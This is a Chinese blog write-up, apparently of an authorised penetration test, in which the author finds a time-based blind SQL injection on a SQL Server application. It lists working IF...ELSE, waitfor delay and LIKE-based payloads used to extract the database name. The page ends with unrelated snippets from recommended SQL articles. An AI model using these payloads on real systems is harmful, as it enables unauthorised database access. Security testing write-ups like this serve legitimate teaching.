informix中if else使用_使用IF+ELSE来进行SQL注入

最新推荐文章于 2022-07-10 12:56:24 发布
最新推荐文章于 2022-07-10 12:56:24 发布
阅读量558 收藏
点赞数
文章标签: informix中if else使用 sql server if

0x01

某日,一女徒弟找我,让我帮她测一个授权项目。

必须先拿@长亭科技的xray跑一下。

24402794ddd43203222a5f6a1543473c.png

随便点点,新增点内容,然后删除。

xray立刻提示 Vuln:sqldet

SQL注入

3c5f6c955a40b81bdb01de28b9eeefe5.png

还没开始就结束了。

XRAY牛逼PLUS!!!

0x02

下面开始漏洞验证。

上burpsuite,然后修改delay 后面的时间。 0:0:1 0:0:5 .....

624dc9c5922b8c32edf737943aaa3bfa.png

漏洞存在。

0x03

那么怎么也得拿出点数据,甲方才能认可吧。

就以 db_name() 为目标吧。

然后测试 and 1=1 or 1=1 这些熟悉的payload,发现有过滤。并没有办法有效的获取数据。

中午回家吃饭,睡一觉。晚上继续测试。想到了,之前测mysql的时候,我喜欢用if(1,sleep(5),1)来获取数据。

那么SQL-server的if呢?

尝试payload:

'+if +'1'='1'+select+'1'+else+waitfor+delay+'0:0:2 无延时
'+if +'1'='2'+select+'1'+else+waitfor+delay+'0:0:2 延时2秒

OK,那么开始数据获取

left(db_name(),1)='a' 报错,此路不通。

substring(db_name(),0,1)='a' 报错,此路不通。

我靠!

0x04

最后只能通过like来获取数据。

那么最终的payload就是:

'+if +db_name()+like+'%a%'+select+'1'+else+waitfor+delay+'0:0:2 无延时
'+if +db_name()+like+'%b%'+select+'1'+else+waitfor+delay+'0:0:2 延时2秒

然后写了一个脚本,跑出db_name() xxxxxx

嗯,到此为止。

weixin_39612720
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sql Server 的“if ... else...” 语句
qq_36872323的博客
06-18 9084
一.格式 if exists(条件判断) {执行语句1} else {执行语句2} 二.实例 --现有数据表:【Table1】 --查询语句: Select1: select cols1 from Table1 where cols1=0 --更新语句: Update1: update Table1 set cols1=1 where cols1=0 --添加语句: Insert1: ...
sql的if和else
北冥的博客
06-11 5万+
MySQL的IF既可以作为表达式用,也可在存储过程作为流程控制语句使用,如下是做为表达式使用: IF表达式 IF(expr1,expr2,expr3) 如果 expr1 是TRUE (expr1 <> 0 and expr1 <> NULL),则 IF()的返回值为expr2; 否则返回值则为 expr3。IF() 的返回值为数字值或字符串值,具体情况视其所在语境而定。 SELECT IF(sva=1,"男","女") AS s FROM table_name WHERE sva
informixif else使用_mysql索引,if/else,循环,数据备份还原,事务,视图基本使用
weixin_39884074的博客
11-28 721
索引MySQL官方对索引的定义为:索引(index)是帮助MySQL高效获取数据的数据结构(有序)。在数据之外,数据库系统还维护者满足特定查找算法的数据结构,这些数据结构以某种方式引用(指向)数据,这样就可以在这些数据结构上实现高级查找算法,这种数据结构就是索引。索引优势劣势优势1)类似于书籍的目录索引,提高数据检索的效率,降低数据库的IO成本。2)通过索引列对数据进行排序,降低数据排序...
sql if else语句_判断语句:if...elif...else
weixin_39856269的博客
12-16 1073
Python是一种计算机编程语言。计算机编程语言和我们日常使用的自然语言有所不同,最大的区别就是,自然语言在不同的语境下有不同的理解,而计算机要根据编程语言执行任务,就必须保证编程语言写出的程序决不能有歧义,所以,任何一种编程语言都有自己的一套语法,编译器或者解释器就是负责把符合语法的程序代码转换成CPU能够执行的机器码,然后执行。Python也不例外。Python的语法比较简单,采用缩...
SQL的if-else判断语句
悠然星的博客
07-10 3174
SQL的if-else判断语句 众所周知,if-else判断在任何地方都很有用,在SQL语句,"CASE WHEN … THEN … ELSE … END"语句可以用在增删改查各类语句。 修改判断 给个情景:妇女节大回馈,2020年注册的新用户,所有成年女性账号送10元红包,其他用户送5元红包,自动充值。 示例语句如下: -- ...
Informix_4gl_basic.rar_4gl_Informix_4gl_basic_TCPUP.r_informix_i
09-23
3. **流程控制**:包括条件语句(如IF-THEN-ELSE)和循环结构(如WHILE、FOR),用于控制程序执行流程。 4. **子程序和模块化**:4GL支持函数和过程的定义,便于代码复用和组织,提高程序的可读性和维护性。 **...
informix_存储过程
04-20
- 输出日志:在存储过程使用`PUT`语句打印间结果和调试信息。 - `DECLARE`语句:声明并初始化变量,便于追踪变量值的变化。 - 使用`dbaccess`的交互式模式,逐行执行存储过程,观察每一步的效果。 在编写和维护...
SQL_Server_2005编程从入门到精通.ppt
05-13
此外,T-SQL还包括流程控制语句,如IF-ELSE、WHILE和BEGIN-END,使得在数据库环境编写复杂逻辑成为可能。 在SQL Server 2005,用户可以利用这些语言特性进行数据库设计、数据查询、事务处理、存储过程和触发器...
INFORMIX教程
01-30
在学习过程,建议首先理解4GL的基本语法和数据类型,然后逐步学习控制流程和函数过程的使用,接着掌握数据库操作,特别是如何结合SQL与4GL进行交互。最后,通过实际项目或者书提供的练习来巩固所学知识,提升...
PowerBuilder应用程序在SQL Anywhere数据库动态创建表的方法.pdf
最新发布
01-03
在大型数据库管理系统如SysBase、Oracle、Informix,PowerBuilder应用可以利用SQL语句(如CREATE TABLE)来实现动态建表。然而,当使用PowerBuilder自带的轻型数据库SQL Anywhere时,如何动态创建表就成为一个挑战...
SQL 流程控制语句 之一 IF…ELSE语句
热门推荐
对象本无根,类型亦无形。本来无一物,何处惹尘埃
07-10 7万+
 SQL 流程控制语句 之一  IF…ELSE语句 有表 publishers   如下图: 执行IF…ELSE语句:declare @a int,@b varchar(100)set @a=(select count(titles_id) from titles);set @b=convert(varchar(100),@a);if @a     se
SQLCase的使用方法
liaoyuanzi的专栏
06-18 980
SQLCase的使用方法 Case具有两种格式。简单Case函数和Case搜索函数。 --简单Case函数 CASE sex          WHEN '1' THEN '男'          WHEN '2' THEN '女' ELSE '其他' END --Case搜索函数 CASE WHEN sex = '1' THEN '男'
如何解决代码if…else 过多的问题
架构文摘
05-07 745
加个“星标”,每天上午 09:25,干货推送!来源:https://www.cnblogs.com/eric-shao/p/10115577.html作者:艾瑞克·邵前言if…else ...
informixif else使用_面试官:代码出现大量的if/else,需要优化,你有什么好方案?...
weixin_39551188的博客
12-01 115
每晚10点,捕获技术思考和创业资源洞察、分享职场生活、职场攻略、领导同事相处技巧和创业资源文|洪生鹏本文旨在抛砖引玉,具体实施方案需要自己在实践动手去尝试,不断尝试,不断改进调优。if else作为每种编程语言都不可或缺的条件语句,在编程时会大量被使用。但要是稍微不注意,就会在开发过程出现大量if else的场景,有的嵌套七八个,甚至更多,很显然这样的代码非常不优雅,可读性也不是很好,后期维护...
oracleif/else功能的实现的3种写法
ZChangfeng的博客
12-05 3016
1、标准sql规范 一、单个IF 1、 if a=... then ......... end if; 2、 if a=... then ...... else .... end if; 二、多个IF if a=.. then ...... elsif a=.. then .... end if; 这里间是“ELSIF”,而不是ELSE IF 。这里需要特别注
elif else if oracle_INFORMIX和ORACLE存储过程异同
weixin_39747630的博客
12-18 283
在工作过程涉及到过有时要进行INFORMIX和ORACLE之间的移植,有时应用需要既支持INFORMIX数据库又要支持ORACLE数据库,如果应用程序涉及到存储过程的话,就需要既熟悉INFORMIX存储过程的写法,又需要熟悉ORACLE存储过程的写法。笔者将在工作总结的一些经验写出来与大家共享。建立存储过程的语法一、Informixcreate procedure proc_name( [.....
技术总监:求求你,别写这么多if...else..了
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
03-21 1058
作者丨艾瑞克·邵https://www.cnblogs.com/eric-shao/p/10115577.html前言if...else 是所有高级编...
elif else if oracle_Informix与Oracle的异同
weixin_39655362的博客
12-18 89
INFORMIX与ORACLE的异同本文主要从业务开发、测试的角度阐述Informix与Oracle的不同,并不适合SMS、支撑的同学们。另外有些内容是从其他一些资料上借花献佛呈现给大家的,希望相关的兄弟不要出来索要版权。水平有限又写得匆忙,如有错误,欢迎大家指正,以便更改。―――吴继锋1、登陆数据库Informix与oracle都提供了各自的数据库操作环境:dbaccess、sqlplusInf...
SQL IF..ELSE..在存储过程的使用规范
じJF[CMS]ve
04-18 3850
分类:SQL存储过程(@city nvarchar(20),@town nvarchar(20),@village nvarchar(20))asdeclare @num numeric(10)declare @yd_num numeric(10)declare @lt_num numeric(10)declare @gh_num numeric(10)declare @xlt_num num
IBM Informix SQL语法指南
Informix SQL语法的全面理解和熟练掌握,对于任何使用Informix数据库的开发者和管理员来说都是至关重要的。这份文档作为Informix SQL的官方指南,是学习和参考的宝贵资料,包含了丰富的示例和解释,有助于读者深入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值